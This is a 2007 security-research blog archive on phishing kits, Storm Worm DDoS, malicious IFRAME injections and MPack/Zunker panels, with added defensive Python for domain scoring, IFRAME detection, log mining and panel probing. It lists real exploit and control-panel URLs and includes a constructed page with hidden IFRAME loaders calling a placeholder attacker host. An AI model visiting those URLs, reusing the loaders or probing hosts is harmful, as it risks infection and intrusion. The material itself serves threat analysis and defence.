The Truth Serum - Have a Drink!

September 21, 2007
Which security vendor would you rather choose if you were to ignore your current Return on Security Investment model? The one telling you that "everything's under control" and that "malicious attackers are losing creativity and cannot bypass our security solutions", or the one whose attitude is "our solutions fully demonstrate marginal thinking in respect to fighting cyber threats, namely, they mitigate certain risks and limit the probability of a security incident, but do not and cannot provide 100% security"?

Basic human psychology and purchasing habits would stick with the first one, the one pretending to offer 100% security, something even a condom cannot offer, yet everyone's thankfully using them. Even worse is falling victim to the myopia that the market leader, or the company with the highest brand equity, is actually the one worth doing business with. As it appears, McAfee CEO David DeWalt had a drink of the truth serum before InformationWeek's 500 Conference in order to comment that "We're in inning two of a nine-inning game here" in respect to how cyber threats often outpace security measures. Moreover, a year ago I commented on a Gartner analyst's statement that security is all about the percentage of budget allocated, and therefore the more you spend the more secure you get, among the most common myopias nowadays. Now, Gartner vice-president John Pescatore is wisely insisting that companies spend less on IT security, and given that when Gartner sneezes the whole industry catches a cold, it's a step in the right direction: debunking common security myopias.

In a world dominated by perimeter defense solutions, being a visionary realist is an objective luxury.

DIY Phishing Kit Goes 2.0

September 20, 2007
With the release of the second version of the DIY phishing kit that I covered in a previous post, next to commentary on another one and on a DIY pharming tool, the time needed to create a phishing page just got shorter than it used to be. Moreover, the phishing ecosystem is getting closer to fully achieving its malicious economies of scale, ones where the number of phishing campaigns in the wild outpaces the capacity for shutting them down in time. Even worse, phishers do not seem interested in re-inventing the wheel by creating a new phishing page for every site or service; instead, such phishing pages are now a commodity, and with the ecosystem clearly cooperating with malware authors, you end up in a situation where a malware infected host is not just hosting malware for the next victim to get infected with, running multiple DNS servers, and sending out spam and phishing emails, but also hosting the phishing pages themselves.

Amateur phishers do not put effort into ensuring the quality and lifetime of their phishing campaigns, and you can easily recognize such a campaign by visiting the phishing URL you've just received only to find it's already down. The more sophisticated phishers, however, are not just efficiency-obsessed, but also take advantage of typosquatting and basic segmentation approaches, for instance acquiring a Russian email database to use as the foundation for a WebMoney phishing campaign, and a U.S. one for a PayPal campaign. Moreover, sophisticated phishers put more effort and time into personalizing the emails and, in rare cases, the phishing pages themselves, in between localizing the campaign by having it translated into the local language of the country the email database belongs to, thus improving the chances of the campaign. This is yet another disturbing trend worth commenting on: malware is maturing into a services-centered economy, and so is the case with spamming and phishing, a logical development given the commoditization of what used to be very exclusive tools.

What are the major improvements in the new version? In the first one, the phisher had to manually paste the source code of the real page, have the kit redirect the submitted data to a third-party URL, and also manually fix the image locations to ensure that they would load properly. In the second version, there are POST and GET commands available so that the source code gets acquired automatically, and an internal Image Grabber so that the exact URLs of all the images within the login page can be easily integrated into the phishing page about to be generated. Getting back to differentiating the amateur from the sophisticated phisher, the latter have more resources at their disposal and more confidence in their hosting provider, so that instead of loading the images from the original site, they host them locally. This kit will inevitably continue to evolve; I wish the end user's understanding of how to protect against "push" phishing attacks evolved proportionally.


Custom DDoS Capabilities Within a Malware

September 19, 2007
DDoS capabilities within a malware are nothing new and are in fact becoming a commodity feature, but compared to the average DDoS tools with up to two different DoS attack approaches, or the types of malware with hardcoded IPs to be attacked, there's a disturbing trend to diversify the DoS techniques used as much as possible to improve the chances of a successful attack, not to mention the allocation of automatic self-defensive DDoS back at curious parties, made possible by the oversupply of infected hosts. As you can see in this particular malware (high detection rate), the DDoS options within are not only diverse enough to cause a lot of damage, but simultaneous combinations are also possible.

Now comes the digitally ugly part. Open source malware results in many different variants with a huge variety of new modules and options implemented within; even worse, the software client can indeed mature into a web based malware C&C like the ones we've been seeing since the beginning of 2007. And this is exactly what happened with this open source malware: a Chinese hacking team is currently offering a Web builder for sale, making it possible to integrate the malware on the Web in a typical do-it-yourself fashion. What types of attacks are included?

- ICMP/SYN/TCP and UDP flooding
- HTTP no-cache and GET flooding
- CC (Challenge Collapsar) HTTP flood variants
- GAME, CIDR and hybrid flooding capabilities

The Black Sun bot, the Cyber bot, MPack, IcePack, WebAttacker, the Nuclear Malware Kit and Zunker are all Web based malware platforms that were originally released as such, unlike the Web adaptation of this one.

Two Cyber Jihadist Blogs Now Offline

September 19, 2007
Jihad Fields are Calling and The Ignored Puzzle of Knowledge are down; apparently the authors themselves decided to delete them, as opposed to WordPress shutting down the Global Islamic Media Front as happened before. Ensuring that these "tip of the iceberg" cyber jihadist communities stay offline has a long-term PSYOPS effect on future wannabe cyber jihadists wanting to operate such communities, ones where talkers eventually turn into doers.

A Chinese Malware Downloader in the Wild

September 17, 2007
This is an example of a recently released in-the-wild DIY downloader with rather average features, such as the ability for the malware author to choose multiple locations for the files to be "dropped", as well as the time interval at which to check for newly distributed binaries. The high detection rate of the downloader itself (23/32, 71.88%) is not the main point I'd like to emphasize, but rather that, compared to the majority of downloaders courtesy of Russian malware authors that I occasionally come across, this is a Chinese one. China is often blamed for being the country hosting the highest percentage of malware in the world; however, China is also the country with the highest percentage of infected PCs, and as we've seen with Storm Worm, an infected host starts acting as both infection and propagation vector for the malware in question. As in any other local malware market, DIY tools get released so that script kiddies can generate enough noise to keep the more sophisticated malware campaigns running behind the curtains.

PayPal and eBay Phishing Domains

September 17, 2007
As I needed another benchmark for creative typosquatting next to my best finding, this World of Warcraft domain scam, I stumbled upon the following list of domains, where the most creative domain squatting is done solely for the purpose of including the domains within a typical phishing scam URL structure. Some of the domains are actual Rock Phish ones that are currently hosting live phishing campaigns:

paypal-online-account.com
paypal-user-update.com
paypal-support1.com
paypal-account-protection.com
paypal1-login.com
paypal-accounts-update.com

Some "creative" ones to be abused:

paypal-aspx.com
paypal-cgi3.info
paypal-cmd.com
paypal-comlwebscrc-login-run.com
paypal-confirmation-id-0746795.com

And since PayPal is actually eBay after the acquisition, here are some "creative" eBay domain scams as well:

ebay-com-isapidll.com
ebayisapidll-cgi.com
ebayisapidllaw2.com
ebayisapidllu.com

Authentication itself seems to be a priority, as the customer must possess tangible proof that her transactions' security is somehow enhanced by layered authentication, no doubt about it. But with phishers actively using a "push" model that is starting to visually social engineer customers by registering domains imitating PayPal and eBay's web application structure, authentication itself shouldn't be priority number one the way it currently is, as phishers are not even trying to bypass it.

Stats courtesy of the Anti-Phishing Working Group.
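The domains above imitate the brand plus fragments of the real site's URL structure (cgi-bin, webscr, ISAPI .dll paths). The following is an added example, not code from the original post, of how a brand-protection or mail-filtering team could triage a feed of newly registered domains for that pattern. The token lists are this example's own heuristic derived from the page's list, the weights are arbitrary assumptions, and the allowlist is a placeholder; the domains fed in at the bottom are the ones listed above plus constructed controls.

```python
import re
from difflib import SequenceMatcher

BRANDS = ("paypal", "ebay")
# Fragments of the real web applications' URL structure that show up inside the
# squatted domains above; treating them as signals is this example's own heuristic.
APP_PATH_TOKENS = {"cgi", "cgi3", "webscr", "webscrc", "comlwebscrc", "isapi",
                   "isapidll", "dll", "aspx", "cmd", "run"}
LURE_TOKENS = {"login", "account", "accounts", "update", "protection", "support",
               "confirmation", "secure", "verify", "user", "online", "id"}

def registrable_label(domain):
    """'paypal-cgi3.info' -> 'paypal-cgi3' (naive: drops the last label only)."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def tokens(label):
    """Split on separators and letter/digit boundaries: 'paypal1-login' -> ['paypal','1','login']."""
    return [t for t in re.split(r"[-_\s]+|(?<=\D)(?=\d)|(?<=\d)(?=\D)", label) if t]

def brand_similarity(token):
    """Closest brand by fuzzy ratio, to catch typos such as 'paypa1' or 'ebey'."""
    return max((SequenceMatcher(None, token, b).ratio(), b) for b in BRANDS)

def score_domain(domain, allowlist=frozenset()):
    """Return (score, reasons). 0 means no brand reference worth a look."""
    if domain.lower() in allowlist:
        return 0, ["allowlisted"]
    label = registrable_label(domain)
    reasons, score = [], 0
    brand = next((b for b in BRANDS if b in label), None)
    if brand:
        score += 3
        reasons.append(f"contains brand '{brand}'")
        rest = label.replace(brand, " ", 1)
    else:
        rest = label
        for t in tokens(label):
            ratio, b = brand_similarity(t)
            if t.isalpha() and ratio >= 0.8:   # lookalike token, e.g. 'paypa' from 'paypa1'
                score += 2
                reasons.append(f"'{t}' resembles '{b}'")
                rest = rest.replace(t, " ", 1)
                break
    if not reasons:
        return 0, []
    for t in tokens(rest):
        if t in APP_PATH_TOKENS or t.startswith(("isapi", "webscr", "cgi")):
            score += 2
            reasons.append(f"web-app path fragment '{t}'")
        elif t in LURE_TOKENS:
            score += 1
            reasons.append(f"lure word '{t}'")
        elif t.isdigit():
            score += 1
            reasons.append(f"digit filler '{t}'")
    return score, reasons

def rank_domains(domains, allowlist=frozenset()):
    """Highest-scoring domains first, as (domain, score, reasons)."""
    scored = [(d, *score_domain(d, allowlist)) for d in domains]
    return sorted(scored, key=lambda x: -x[1])

if __name__ == "__main__":
    # The page's domains plus two constructed controls (a legitimate one and a typo one).
    feed = ["paypal-online-account.com", "paypal-cgi3.info", "paypal-comlwebscrc-login-run.com",
            "paypal-confirmation-id-0746795.com", "ebay-com-isapidll.com", "ebayisapidllaw2.com",
            "paypa1-login.com", "paypal.com", "example.com"]
    for d, s, r in rank_domains(feed, allowlist={"paypal.com"}):
        print(f"{s:2}  {d:40} {'; '.join(r)}")
```

The fuzzy branch only fires when no exact brand string is present, so a typo domain is scored once rather than twice, and anything with a score of 0 drops out of the queue.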

Storm Worm's DDoS Attitude - Part Two

September 17, 2007
After commenting on Storm Worm's logical connection with the recent DDoS attacks against anti-scam web sites, SecureWorks timely released details of what actions could trigger a DDoS attack from Storm back at the researcher's host, and what type of DDoS attacks are launched exactly:

"The attacks do show signs of being automated. Certain actions reliably trigger attacks. Investigators who can withstand the onslaught and have decided to test their theories (with cooperation from their ISPs, of course) can reliably trigger DDoS attacks on themselves. In one case, probing more than four unique Peacomm botnet HTTP proxies within ten seconds results in a flood of TCP SYN and ICMP packets, which last for about two hours. That’s all fairly regular."

To me, this tactic is more of a "hey, our situational awareness of your actions to shut us down is good enough" type of statement, but why would the botnet masters risk exposing infected hosts rather than having them act like nothing's wrong with them? Mainly because if infected hosts were a scarce resource they perhaps would keep them quiet, but in Storm Worm's case the oversupply of infected hosts allows them to dedicate resources to automatic self-defensive DDoS.

U.S. Consulate St. Petersburg Serving Malware

September 14, 2007
If that's not a pattern and good timing, it's a malicious anomaly. On the 31st of August, 2007, Bank of India was serving malware courtesy of the Russian Business Network. This week, evidence that the U.S. Consulate in St. Petersburg, Russia was serving malware to its visitors proved to be true. The web site is now clean, but assessing the IFRAME-ed URLs used in the attack is possible as they're still reachable. It's still unknown for how long the IFRAMEs remained embedded at the Consulate's web site, as well as when they were cleaned, but the attack was still active on the 2nd of September, 2007, just two days after Bank of India's malware attack. It's also worth mentioning that, compared to the most recent malware embedded attacks which had the IFRAMEs directly embedded within, in this one the IFRAME itself is obfuscated but the live exploit URL isn't.

Tipped off by a third party, Sophos managed to locate the exact URL by deobfuscating the rather simple URL obfuscation, and Fraser Howard posted some interesting details on their blog:

"The purpose of the attacks is to infect victims with Trojans from the two attack sites. As discussed in a recent paper, the increased use of automation to continually re-encrypt/pack/obfuscate the Trojans highlights the need for good generic detection technology. A system to continuously monitor these files in order to maintain detection is essential. So, to answer the question of whether the U.S. Consulate General site was specifically targeted in this attack - my answer is no, probably not. The prevalence of other much smaller sites compromised in exactly the same way (in just seven days worth of data) suggests that the hackers just happened to have caught a big fish as they trawled for vulnerable servers. It just goes to show that security is important on all machines hosting both small and large websites."

We could greatly expand on those as a matter of fact. The IFRAME used leads us to verymonkey.com/goof/index.php (209.123.181.185) and verymonkey.com/test/index.php, which exploits a modified MDAC vulnerability and aims to execute the following binary, Virus.Win32.Zapchast.DA:

Detection rate: 6/32 (18.75%)
AntiVir 2007.09.14 DR/Delphi.Gen
AVG 2007.09.14 Obfustat.NPJ
eSafe 2007.09.13 Suspicious Trojan/Worm
Ikarus 2007.09.14 Virus.Win32.Zapchast.DA
VirusBuster 2007.09.13 Trojan.Agent.JVF
Webwasher-Gateway 2007.09.14 Trojan.Delphi.Gen

File size: 28672 bytes
MD5: a25ad0045d195016690b299bfb8b75d1
SHA1: ab219c50b0adc84f702c696797e81411b6eab596

Is this obfuscated IFRAME-ing a fad or a trend? I think it's a trend, since IFRAME-ing to a secondary domain taking advantage of popular web malware exploitation techniques is already rated as suspicious by security vendors, with Google themselves warning you that "this site may harm your computer", and so the attackers need to buy time. Moreover, such obfuscations make it harder to assess how many sites, and which ones exactly, were victims of the attack in an OSINT manner. It gets even more interesting: the IP hosting verymonkey.com was historically used to host the banksoffscotland.co.uk scam web site in March this year. In case you wonder, it's not the RBN that's behind this malware embedded attack, but let's say it's a subsidiary of the RBN.
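Since the point of the obfuscation is to hide the IFRAME from vendors' crawlers while the exploit URL itself stays in the clear, a site owner auditing their own pages only needs to peel off the cheap encodings before looking for the tag. Below is an added example of such a check, not Sophos' or the original post's code. It assumes the two encodings commonly used for this, `unescape('%3C...')` and `\xNN`/`\uNNNN` string escapes, which may or may not be the exact form used against the Consulate; the HTML it scans is constructed, and `attacker.invalid` is a placeholder host.

```python
import re
from urllib.parse import unquote, urlsplit

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)

def decode_layers(html, max_rounds=5):
    """Undo unescape('%3C...') calls and \\xNN / \\uNNNN escapes until nothing changes.
    These are assumed encodings, chosen because injected loaders commonly use them."""
    text = html
    for _ in range(max_rounds):
        new = text
        for m in UNESCAPE_RE.finditer(text):
            new = new.replace(m.group(0), unquote(m.group(2)))
        new = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), new)
        new = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), new)
        if new == text:
            break
        text = new
    return text

def parse_attrs(attr_text):
    """Tag attributes as a lowercase dict; handles double-, single- and un-quoted values."""
    return {k.lower(): (dq or sq or bare or "") for k, dq, sq, bare in ATTR_RE.findall(attr_text)}

def _tiny(value):
    """True for 0/1-pixel dimensions ('0', '1', '0px', '1%')."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1

def suspicious_iframes(html, page_host):
    """One finding per iframe that is hidden, near-zero sized, or points off-site.
    Returns [(src, [reasons]), ...]; iframes present only after decoding are flagged too."""
    decoded = decode_layers(html)
    findings = []
    for m in IFRAME_RE.finditer(decoded):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        reasons = []
        if _tiny(attrs.get("width")) or _tiny(attrs.get("height")):
            reasons.append("near-zero size")
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden via style")
        host = urlsplit(src).hostname
        if host and host.lower() != page_host.lower():
            reasons.append("off-site src " + host)
        if m.group(0) not in html:          # tag only exists once the script is decoded
            reasons.append("emitted from encoded script")
        if reasons:
            findings.append((src, reasons))
    return findings

# Constructed page: one legitimate same-site iframe plus two injected loaders.
SAMPLE_HTML = r"""<html><body>
<iframe src="http://www.example.gov/widgets/calendar.html" width="300" height="200"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://attacker.invalid/goof/index.php%22 width=0 height=0%3E%3C/iframe%3E'));</script>
<script>var s="\x3ciframe src=\x22http://attacker.invalid/test/index.php\x22 style=\x22visibility: hidden\x22\x3e\x3c/iframe\x3e";document.write(s);</script>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_HTML, "www.example.gov"):
        print(src, "->", ", ".join(reasons))
```

Run it against a saved copy of each page rather than a live fetch, so the exploit URL is never requested from the auditing host; the decoded `src` values are what you then check against the IPs and domains discussed above.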

209 Host Locked

September 12, 2007
Ever come across this fake error message? A "209 Host Locked" message on a fraudulent domain is the default indication that you're on a Rock Phish domain, that is, a single domain hosting multiple phishing campaigns aimed at different financial institutions. And as more Royal Bank of Scotland phishing emails are circulating in the wild, these very same emails pointed me to a Chinese Rock Phish campaign which was shut down as of yesterday. What is different in this campaign, compared to the previous one? The phishers put more effort into ensuring the phishing email gets through spam filters by using spacing, adding _ in front of random words, as well as the usual garbage content at the end of the email. All the URLs within the campaign are already in PhishTank, and DSLreports.com's wisdom-of-the-anti-phishers crowd continues exposing Rock Phish domains on a daily basis, an effort worth keeping track of.

The Rock Phish Kit is the logical evolution of DIY phishing kits like the one I've already blogged about; however, the two concepts are not mutually exclusive but apparently tend to work together. The DIY phishing kits on their part are largely used in the planning stage of the phishing campaign, that is, fake sites get generated and the data obtained is forwarded to a single place, which is where Rock Phish starts getting used, namely in the execution stage, where all the phishing pages generated get hosted on a single domain. Phishing efficiency vs. Rock Phish's weakness due to the centralization of numerous campaigns on a single domain: it's the phishers' trade-off. Within the phishing ecosystem, there are numerous approaches phishers tend to use to achieve maximum efficiency, ones I've already discussed in a previous post. The most prolific problem to me remains phishing 1.0's "push" model, which is still remarkably successful compared to the more advanced man-in-the-middle phishing attacks and pharming.

From my perspective, if a financial institution really wants to protect its customers from phishing scams, it would first segment the threat, evaluate its customers' perception of it and their current level of awareness, and then start an educational campaign aiming not to teach them how to recognize whether a site is a phish or not, but how to report and ignore the "push" model emails that arrive in their mailboxes. From another, rather pragmatic perspective, phishers don't just load images for their phishing emails and pages from the company's own website; the majority of phishing pages also redirect to the real web site after the data has been submitted, an early warning system in itself.
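That early warning system is sitting in the institution's own web server logs: image requests and post-submit arrivals whose Referer is some other host. The following is an added example, not part of the original post, of mining a combined-format access log for exactly that. The log lines are constructed (documentation-range client addresses, a PayPal-style own domain, and squatted hosts modelled on the ones listed in the previous post), and the `/login` landing path is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Sep/2007:10:01:02 +0000] "GET /images/logo.gif HTTP/1.1" 200 4312 "https://www.paypal.com/login" "Mozilla/4.0"
203.0.113.9 - - [17/Sep/2007:10:01:05 +0000] "GET /images/logo.gif HTTP/1.1" 200 4312 "http://paypal-account-protection.com/cgi-bin/webscr.php" "Mozilla/4.0"
203.0.113.9 - - [17/Sep/2007:10:01:05 +0000] "GET /images/secure.gif HTTP/1.1" 200 1200 "http://paypal-account-protection.com/cgi-bin/webscr.php" "Mozilla/4.0"
198.51.100.4 - - [17/Sep/2007:10:02:11 +0000] "GET /login?done=1 HTTP/1.1" 200 8800 "http://paypal-account-protection.com/cgi-bin/webscr.php" "Mozilla/4.0"
198.51.100.8 - - [17/Sep/2007:10:03:00 +0000] "GET /images/logo.gif HTTP/1.1" 200 4312 "-" "Mozilla/4.0"
198.51.100.5 - - [17/Sep/2007:10:03:30 +0000] "GET /images/logo.gif HTTP/1.1" 200 4312 "http://209.123.181.185/goof/index.php" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
IMAGE_EXT = (".gif", ".png", ".jpg", ".jpeg", ".ico", ".css")

def parse_combined(lines):
    """Yield a dict per well-formed combined-format line; malformed lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            yield m.groupdict()

def referer_host(referer):
    """Lowercased hostname of the Referer header, or None when absent or unparseable."""
    if not referer or referer == "-":
        return None
    host = urlsplit(referer).hostname
    return host.lower() if host else None

def is_own_host(host, own_domains):
    """True if host is one of our domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in own_domains)

def find_hotlinking_phish(lines, own_domains, landing_paths=("/login",)):
    """Group, by referring host, foreign-Referer requests for our images and
    foreign-Referer arrivals on our landing pages (the post-submit redirect).
    Returns {referer_host: {"images": n, "landings": n, "client_ips": set()}}."""
    hits = defaultdict(lambda: {"images": 0, "landings": 0, "client_ips": set()})
    for rec in parse_combined(lines):
        host = referer_host(rec["referer"])
        if host is None or is_own_host(host, own_domains):
            continue                      # no Referer, or our own site: not interesting
        path = urlsplit(rec["path"]).path.lower()
        if path.endswith(IMAGE_EXT):
            hits[host]["images"] += 1
        elif any(path == p or path.startswith(p + "/") for p in landing_paths):
            hits[host]["landings"] += 1
        else:
            continue
        hits[host]["client_ips"].add(rec["ip"])
    return dict(hits)

if __name__ == "__main__":
    report = find_hotlinking_phish(SAMPLE_LOG.splitlines(), {"paypal.com"})
    for host, st in sorted(report.items(), key=lambda kv: -(kv[1]["images"] + kv[1]["landings"])):
        print(f"{host}: images={st['images']} landings={st['landings']} clients={len(st['client_ips'])}")
```

A referring host that both hotlinks the logo and delivers visitors to the login page a minute later is the phishing page itself, and the client IPs attached to it are the customers who have probably already typed in their credentials.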

Storm Worm's DDoS Attitude

September 11, 2007
Stage one: infect as many end users with high speed Internet access as possible through the use of client side vulnerabilities. Stage two: ensure the longest possible lifecycle for the malware campaign by having the newly released binaries hosted at the infected PCs themselves. Stage three: take advantage of fast-flux networks to make it harder to shut down the entire botnet. And stage four: strike back at any security researcher or vendor playing around with Storm Worm's fast-flux network or somehow messing with its malicious economies of scale on a worldwide basis. On Friday I received an email from Susan Williams at aa419.org, and it looks like several other anti-fraud sites are getting DDoS-ed too:

"On September 2 2007, online scammers began an automated DDoS attack against aa419.org, with the goal of shutting down the anti-fraud site. For some time, aa419 was able to filter the worldwide botnet's attacks by monitoring connections and only allowing legitimate visitors to access the site. However, by September 5 the hoster was being overwhelmed with nearly 400 GB of incoming requests every hour. Rather than let their infrastructure melt under the onslaught, the server is currently offline. This massive distributed denial of service (DDoS) attack was inspired by aa419.org's mission to blacklist and shut down scam web sites. Since 2004, the all-volunteer organization has recorded more than 18,000 such sites. In addition to publicly warning potential victims of fraud, they work with hosters and registrars to take scam web sites offline quickly, with a success rate of over 97% shut down. Susan Williams, press officer for aa419.org, said, "On the whole, we're positive about this. Not that we enjoy being offline; quite the opposite. But being attacked with a botnet of this magnitude tells us that we are doing serious damage to the organized crime networks that run these scams." Internet crime is increasing at record rates, and aa419.org is at the forefront of the fight against it. "We will continue our work regardless of how many criminals are annoyed by it," Williams said."

CastleCops comments on the DDoS taking place at their site too:

"This newest ddos round started about a week ago and knocked us offline for a couple hours while we figured out what was going on. And we're still under attack, so if the site is a bit slower, you know why. Odd month really, lots of sites, lots of sites, are under ddos. We've got over 10k bots attacking us with more being added daily."

As a friend recently pointed out: you ain't making a difference until you start getting DDoS-ed.

Cartoon courtesy of Joyoftech.com; here are more, courtesy of myself.


Google Hacking for MPacks, Zunkers and WebAttackers

September 10, 2007
If wannabe botnet masters really wanted to hide their activities online, they would have blocked Google's crawlers from indexing their default malware kit installations, and changed the default installation settings to random directory and file names, wouldn't they? Apparently, a default deny-all rule for anyone but the botnet masters doesn't exist as a principle among botnet amateurs, which leaves us with lots of malware campaigns to assess and shut down.

The following are IPs and domain names currently or historically used to host MPack, WebAttacker and Zunker control panels, as well as live exploit URLs within the packs. Some are down, others are still accessible, and the rest are publicly cached. If index.php doesn't exist, admin.php or zu.php act as the default admin panel.

MPack Malware Campaigns :

wmigra.org/mpack/index.php
64.62.137.149/~edit/
81.95.145.240/logo/
81.95.150.42/MPack091cbt/index.php
brbody.info/mpack/index.php
innaidina.info/mpack/index.php
rallyesimages.ch/liens/test/
sol.h18.ru/mpack/index.php
icqmir.iplot.ru/mpack/index.php
cordon.ru/mp/
havephun.org/mpack/index.php
xbr.ru/images/old/mpack/index.php
evil-x.org/spk2/
tyt-menia.net/mpack/index.php
rufat.info/mpack/index.php
iwiw-hosting.com/upload/
stepbystepbg.org/img/
mydulichusa.com/mpack/index.php
csextra.wz.cz/weapons/mpack/index.php
d34thnation.com/mpack/index.php
mp3fans.org/mpack084/
innaidina.info/mpack/

WebAttacker's Hosts :

secondsite2.com/cgi-bin/ie0604.cgi
lsdman.info/cgi-bin/ie0604.cgi?bug=MS05-001&SP1
telecarrier.es/cgi-bin/ie0604.cgi
stmare.info/cgi-bin/ie0604.cgi
redcrossonline.cn/cgi-bin/ie0604.cgi

Zunker's C&C :

66.148.74.7/zu/
bundeswehrzentrale.org
skilltests.org/zu/zc.php
zup.secondsite1.com/zu/index.php
stat1.realstatscollect.com/zu/
webcounterstat.info/zu/
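Because the kits ship with fixed directory and file names, verifying whether a reported host still has a panel up is a matter of requesting those default paths. The code below is an added example, not the post's own tooling: the kit-to-path mapping is taken from the URL patterns listed above (mpack/index.php, zu/, zu/zc.php, cgi-bin/ie0604.cgi, plus the admin.php and zu.php fallbacks), while the page-body markers used to tell a live panel from any other 200 response are assumptions that a real deployment would replace with signatures from captured kit copies. The fetcher is injected so the decision logic runs offline; `example.invalid` and its fake responses are constructed.

```python
from urllib.parse import urljoin

# Default panel and exploit paths per kit, taken from the URL patterns listed above;
# assigning admin.php / zu.php fallbacks to specific kits is this example's assumption.
DEFAULT_PATHS = {
    "MPack":       ["mpack/index.php", "mpack/admin.php"],
    "Zunker":      ["zu/index.php", "zu/admin.php", "zu/zu.php", "zu/zc.php"],
    "WebAttacker": ["cgi-bin/ie0604.cgi"],
}

# Hypothetical body markers; real checks need signatures from captured kit copies.
PANEL_MARKERS = ("mpack", "zunker", "ie0604")

def candidate_urls(host, paths=DEFAULT_PATHS):
    """Expand a bare host or URL prefix into the default kit URLs worth checking."""
    base = host if "://" in host else "http://" + host
    if not base.endswith("/"):
        base += "/"
    return [(kit, urljoin(base, p)) for kit, plist in paths.items() for p in plist]

def classify_response(status, body):
    """Map an HTTP status and body to 'panel', 'present', 'gone' or 'unknown'."""
    if status == 200:
        low = (body or "").lower()
        return "panel" if any(m in low for m in PANEL_MARKERS) else "present"
    if status in (404, 410):
        return "gone"
    return "unknown"          # timeouts, 5xx, auth walls: needs a human look

def probe_host(host, fetch, paths=DEFAULT_PATHS):
    """Check every default kit path on `host`. `fetch(url)` returns (status, body);
    passing it in keeps network I/O out of the logic. Returns [(kit, url, outcome)]
    for every path that is not 'gone'."""
    results = []
    for kit, url in candidate_urls(host, paths):
        try:
            status, body = fetch(url)
        except Exception as exc:           # refused connection, DNS failure, timeout
            status, body = None, str(exc)
        outcome = classify_response(status, body)
        if outcome != "gone":
            results.append((kit, url, outcome))
    return results

def urllib_fetch(url, timeout=5):
    """Minimal standard-library fetcher for real use (not exercised offline)."""
    import urllib.request, urllib.error
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/4.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(65536).decode("latin-1")
    except urllib.error.HTTPError as err:
        return err.code, ""

# Constructed responses for a host that still has an MPack statistics panel up.
FAKE_SITE = {
    "http://example.invalid/mpack/index.php": (200, "<title>MPack v0.91 statistics</title>"),
    "http://example.invalid/zu/zc.php": (200, "<html>blank</html>"),
}

def fake_fetch(url):
    return FAKE_SITE.get(url, (404, ""))

if __name__ == "__main__":
    for kit, url, outcome in probe_host("example.invalid", fake_fetch):
        print(f"{kit:12} {outcome:8} {url}")
```

Do this from a throwaway address with your ISP's knowledge; as the Storm Worm posts above show, poking at live malicious infrastructure is exactly the kind of behaviour that draws retaliatory DDoS.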

I also find it very interesting to see VeriSign publicly admitting to hacking into the hosts behind the malware kits (the Russian Business Network in this case) to assess the damage done in the form of the number of infected PCs and with what exactly:

"When VeriSign managed to hack into the RBN computer running the scam, it found accumulated data representing 30,000 such infections. “Every major trojan in the last year links to RBN” says a VeriSign sleuth."

Unethical penetration testing of malicious hosts to assess the damage done by the malware campaign in question wouldn't result in the malware authors striking back with legal complaints; instead, they'll forward some DDoS bandwidth back at the investigating IPs, a consequence I'm sure researchers reading here have experienced before. On the other hand, the RBN themselves are getting more malicious with every new campaign; just consider, for instance, that Russian Business Network IPs were behind the Massive Embedded Web Attack in Italy that took place in June 2007, and the most recent Bank of India breach as well.

Popular Web Malware Exploitation Techniques

September 10, 2007
Who needs zero day vulnerabilities to achieve a widescale malware infection these days? Obviously this once-popular prerequisite for successful client side vulnerability exploitation is no longer needed, but how come? Rather simple, and that's the disturbing part: malicious parties stopped falling victim to the common perception that the end user is so fully patched that zero day vulnerabilities are needed to break through his thought-to-be complex set of security measures; instead, whether through an event study or plain common sense on their part, they've realized that an unpatched and obfuscated vulnerability is just as dangerous as a zero day, and the results have been evident ever since.

Going through the screenshots of the infected population of a certain malware kit, you can clearly see the diversity of the outdated vulnerabilities used. Multi-browser vulnerabilities are IFRAME-ed all-in-one to achieve the highest possible efficiency rate, as there's only a slight chance a visitor will return twice to a site they've managed to embed the malware at. The success of these kits therefore has nothing to do with malicious innovation, but rather with successful tactical warfare against reactive security response. If perimeter defense cannot be breached, it will get either ignored or bypassed, precisely why client side vulnerabilities are back in the game at full speed.

Evidence showcasing this KISS (Keep It Simple, Stupid) principle:

- IcePack, MPack, WebAttacker, the Nuclear Malware Kit, and pretty much every popular malware kit take advantage of outdated vulnerabilities; whether obfuscated or not depends on the pack's version and the malicious party's understanding of the concept

- The Massive Embedded Web Attack in Italy used MPack's outdated arsenal of obfuscated vulnerabilities, and despite that it achieved its objectives and infected thousands of hosts

- The recent Bank of India breach used a modified version of the popular malware kits mentioned above, in between syndicating the hack with another campaign using multi-IFRAME-ing techniques, again taking advantage of outdated vulnerabilities

- Storm Worm's success is mostly due to the fact that the end user is still living in the "malicious attachment" world, and so outdated vulnerabilities are again successfully used against her

